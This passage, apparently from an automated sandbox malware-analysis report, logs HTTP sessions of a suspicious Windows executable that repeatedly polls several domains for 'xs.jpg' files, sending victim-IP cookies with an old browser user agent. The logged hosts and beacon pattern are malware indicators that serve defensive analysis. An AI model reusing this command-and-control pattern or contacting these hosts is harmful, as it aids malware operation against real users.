                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159272|1720159259|3|4|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  17 | 192.168.2.9 | 49729 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:12.546374083 CEST | 299 | OUT | GET /xs.jpg?224a908=215742000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159269|1720159259|3|3|0
                                  Jul 5, 2024 08:01:13.055702925 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:12 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159272|1720159259|3|4|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  18 | 192.168.2.9 | 49730 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:13.080097914 CEST | 302 | OUT | GET /images/xs.jpg?256dbec=353221452 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159269|1720159260|3|3|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:13.565224886 CEST | 333 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:13 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159273|1720159260|3|4|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  19 | 192.168.2.9 | 49731 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:13.592689991 CEST | 190 | OUT | GET /xs.jpg?263e0bf=360900279 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:14.244424105 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:14 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  20 | 192.168.2.9 | 49732 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:14.294188023 CEST | 203 | OUT | GET /images/xs2.jpg?27da790=167157312 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:15.022315025 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:14 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:15.029609919 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:15.256031990 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:15 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:15 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  21 | 192.168.2.9 | 49733 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:15.390551090 CEST | 308 | OUT | GET /images/xs.jpg?2dce9fa=384258000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159272|1720159259|3|4|0
                                  Jul 5, 2024 08:01:16.142571926 CEST | 594 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:16 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159276|1720159259|3|5|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  22 | 192.168.2.9 | 49734 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:16.152287960 CEST | 299 | OUT | GET /xs.jpg?2f6b0f9=149164779 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159272|1720159259|3|4|0
                                  Jul 5, 2024 08:01:17.383012056 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:16 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0
                                  Jul 5, 2024 08:01:17.383548975 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:16 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0
                                  Jul 5, 2024 08:01:17.384350061 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:16 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  23 | 192.168.2.9 | 49735 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:17.395349979 CEST | 302 | OUT | GET /images/xs.jpg?341e887=546510150 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159273|1720159260|3|4|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:17.907382965 CEST | 333 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:17 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159277|1720159260|3|5|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  24 | 192.168.2.9 | 49736 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:17.914841890 CEST | 190 | OUT | GET /xs.jpg?34f3b0d=388668763 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:18.567919016 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:18 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  25 | 192.168.2.9 | 49737 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:18.587393999 CEST | 203 | OUT | GET /images/xs2.jpg?362c1e4=113607624 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:19.293400049 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:19 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:19.340424061 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:19.561398983 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:19 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:19 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  26 | 192.168.2.9 | 49738 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:19.716191053 CEST | 308 | OUT | GET /images/xs.jpg?3c84448=190368984 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159276|1720159259|3|5|0
                                  Jul 5, 2024 08:01:20.445621014 CEST | 594 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:20 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159280|1720159259|3|6|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  27 | 192.168.2.9 | 49739 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:20.454312086 CEST | 299 | OUT | GET /xs.jpg?3dc8d75=518286248 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0
                                  Jul 5, 2024 08:01:20.982238054 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:20 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159280|1720159259|3|6|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  28 | 192.168.2.9 | 49740 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:20.999936104 CEST | 302 | OUT | GET /images/xs.jpg?3e9e01a=262635624 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159277|1720159260|3|5|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:21.542736053 CEST | 333 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:21 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159281|1720159260|3|6|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  29 | 192.168.2.9 | 49741 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:21.557941914 CEST | 190 | OUT | GET /xs.jpg?42142ff=692887030 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:22.208187103 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:22 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  30 | 192.168.2.9 | 49742 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:22.240417004 CEST | 203 | OUT | GET /images/xs2.jpg?434c9e5=282273684 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:22.961486101 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:22 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:22.967592001 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:23.189316034 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:23 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:23 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  31 | 192.168.2.9 | 49743 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:23.310866117 CEST | 308 | OUT | GET /images/xs.jpg?475ad88=299284000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159280|1720159259|3|6|0
                                  Jul 5, 2024 08:01:24.076677084 CEST | 594 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:23 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159283|1720159259|3|7|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  32 | 192.168.2.9 | 49744 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:24.084115028 CEST | 299 | OUT | GET /xs.jpg?4ae2102=706685202 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159280|1720159259|3|6|0
                                  Jul 5, 2024 08:01:24.617609978 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:24 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159284|1720159259|3|7|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  33 | 192.168.2.9 | 49745 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:24.626883984 CEST | 302 | OUT | GET /images/xs.jpg?4c9a32f=401616875 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159281|1720159260|3|6|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:25.142874002 CEST | 333 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:25 GMT
                                  Content-Type: text/html
